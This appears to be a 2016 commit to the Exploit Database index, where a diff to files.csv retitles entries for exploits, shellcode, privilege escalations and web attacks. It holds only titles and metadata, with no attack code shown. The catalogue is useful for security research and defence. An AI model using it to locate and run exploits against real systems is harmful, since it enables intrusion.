DB: 2016-07-09

9 new exploits Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067) Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067) Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability VLC AMV Dangling Pointer Vulnerability VLC - AMV Dangling Pointer Vulnerability Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability HP Client Automation Command Injection HP Client - Automation Command Injection Persistent Systems Client Automation Command Injection RCE Persistent Systems Client Automation - Command Injection RCE ElasticSearch Unauthenticated Remote Code Execution ElasticSearch - Unauthenticated Remote Code Execution ElasticSearch Search Groovy Sandbox Bypass ElasticSearch - Search Groovy Sandbox Bypass Fedora abrt Race Condition Exploit Fedora - abrt Race Condition Exploit ProFTPD 1.3.5 Mod_Copy Command Execution ProFTPD 1.3.5 - Mod_Copy Command Execution Windows ClientCopyImage Win32k Exploit Microsoft Windows - ClientCopyImage Win32k Exploit Wolf CMS Arbitrary File Upload To Command Execution Wolf CMS - Arbitrary File Upload To Command Execution Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1) Kaseya VSA uploader.aspx Arbitrary File Upload Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008) Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008) Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008) Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1) NETGEAR ProSafe Network Management System 300 Arbitrary File Upload NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032) Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032) OS X / iOS Suid Binary Logic Error Kernel Code Execution OS X / iOS - Suid Binary Logic Error Kernel Code Execution Novell ServiceDesk Authenticated File Upload Novell ServiceDesk - Authenticated File Upload Mach Race OS X Local Privilege Escalation Exploit Mach Race OS X - Local Privilege Escalation Exploit Oracle ATS Arbitrary File Upload Oracle Application Testing Suite (ATS) - Arbitrary File Upload Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF Hide.Me VPN Client 1.2.4 - Privilege Escalation InstantHMI 6.1 - Privilege Escalation Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC Microsoft WinDbg logviewer.exe - Crash PoC Linux x86 TCP Reverse Shellcode - 75 bytes php Real Estate Script 3 - Arbitrary File Disclosure CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval Streamo Online Radio And TV Streaming CMS - SQL Injection
2016-07-09 05:06:22 +00:00 · 2016-07-09 05:06:22 +00:00 · 29f0764fac
commit 29f0764fac
parent c7daadde64
10 changed files with 925 additions and 27 deletions
--- a/files.csv
+++ b/files.csv
@ -1630,7 +1630,7 @@ id,file,description,date,author,platform,type,port
 1919,platforms/php/webapps/1919.txt,"CMS Faethon <= 1.3.2 (mainpath) Remote File Inclusion Vulnerability",2006-06-16,K-159,php,webapps,0
 1920,platforms/php/webapps/1920.php,"Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
 1921,platforms/php/webapps/1921.pl,"FlashBB <= 1.1.8 (phpbb_root_path) Remote File Include Exploit",2006-06-17,h4ntu,php,webapps,0
-1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
+1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability",2006-06-17,Basti,php,webapps,0
 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure",2006-06-18,php0t,multiple,local,0
 1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0
@ -12872,7 +12872,7 @@ id,file,description,date,author,platform,type,port
 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta - Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0
 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0
 14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0
-14706,platforms/windows/local/14706.py,"Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
+14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0
 14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0
 14712,platforms/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0
@ -13858,7 +13858,7 @@ id,file,description,date,author,platform,type,port
 15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0
 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0
 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0
-16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
+16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
 16001,platforms/php/webapps/16001.txt,"People Joomla Component 1.0.0 - Local File Inclusion Vulnerability",2011-01-16,"ALTBTA ",php,webapps,0
 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0
@ -14833,7 +14833,7 @@ id,file,description,date,author,platform,type,port
 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69
 17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
 17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0
-17048,platforms/windows/remote/17048.rb,"VLC AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
+17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
 17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0
 17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0
 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0
@ -21506,7 +21506,7 @@ id,file,description,date,author,platform,type,port
 24318,platforms/windows/shellcode/24318.c,"Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
 24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0
 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0
-24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
+24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
 24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0
 24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0
 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0
@ -26934,7 +26934,7 @@ id,file,description,date,author,platform,type,port
 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0
 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0
-29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
+29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal Vulnerability",2007-04-11,Dr.RoVeR,php,webapps,0
 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass Vulnerability",2007-04-11,"Jon Oberheide",cgi,webapps,0
 29843,platforms/windows/remote/29843.txt,"webMethods Glue <= 6.5.1 Console Directory Traversal Vulnerability",2007-04-11,"Patrick Webster",windows,remote,0
@ -32579,7 +32579,7 @@ id,file,description,date,author,platform,type,port
 36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
 36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0
-36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
+36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
 36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0
 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80
 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
@ -32631,7 +32631,7 @@ id,file,description,date,author,platform,type,port
 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
 36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
-36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
+36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
 36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
@ -32756,7 +32756,7 @@ id,file,description,date,author,platform,type,port
 36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0
 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0
 36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0
-36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
+36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
 36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
 36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
 36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
@ -32829,7 +32829,7 @@ id,file,description,date,author,platform,type,port
 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0
 36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0
 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
-36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
+36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
 36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0
 36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0
 36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0
@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port
 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0
 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0
-36747,platforms/linux/local/36747.c,"Fedora abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
+36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
 36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
@ -33640,7 +33640,7 @@ id,file,description,date,author,platform,type,port
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
 37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
-37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
+37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port
 37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot (28 Bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
-37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
+37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
 37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
@ -34307,7 +34307,7 @@ id,file,description,date,author,platform,type,port
 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
 37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
-38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
+38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
@ -34557,7 +34557,7 @@ id,file,description,date,author,platform,type,port
 38272,platforms/windows/dos/38272.txt,"Windows Kernel - Brush Object Use-After-Free Vulnerability (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0
 38273,platforms/win32/dos/38273.txt,"Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
 38274,platforms/win32/dos/38274.txt,"Windows Kernel - NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
-38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
+38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win32,dos,0
 38276,platforms/win32/dos/38276.txt,"Windows Kernel - FlashWindowEx Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
 38277,platforms/win32/dos/38277.txt,"Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
 38278,platforms/win32/dos/38278.txt,"Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
@ -34642,7 +34642,7 @@ id,file,description,date,author,platform,type,port
 38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0
 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0
-38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
+38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
 38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0
 38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0
@ -34879,7 +34879,7 @@ id,file,description,date,author,platform,type,port
 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
 38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
 38612,platforms/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",android,dos,0
-38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
+38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
 38614,platforms/android/dos/38614.txt,"Samsung libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
 38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0
 38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use After Free",2015-11-03,"John Leitch",multiple,dos,0
@ -35544,8 +35544,8 @@ id,file,description,date,author,platform,type,port
 39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
 39308,platforms/linux/dos/39308.c,"Linux Kernel <= 3.x / <= 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0
 39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin <=1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80
-39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
+39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
-39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
+39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
 39312,platforms/lin_x86-64/shellcode/39312.c,"x86_64 Linux xor/not/div Encoded execve Shellcode",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
 39313,platforms/php/webapps/39313.txt,"Food Order Portal 'admin_user_delete.php' Cross Site Request Forgery Vulnerability",2014-09-12,KnocKout,php,webapps,0
 39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
@ -35660,7 +35660,7 @@ id,file,description,date,author,platform,type,port
 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0
 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
-39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)",2016-02-10,koczkatamas,windows,local,0
+39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
 39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure Vulnerability",2016-02-10,Vulnerability-Lab,multiple,webapps,0
 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80
@ -35736,7 +35736,7 @@ id,file,description,date,author,platform,type,port
 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
 39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80
-39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
+39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
 39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69
 39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080
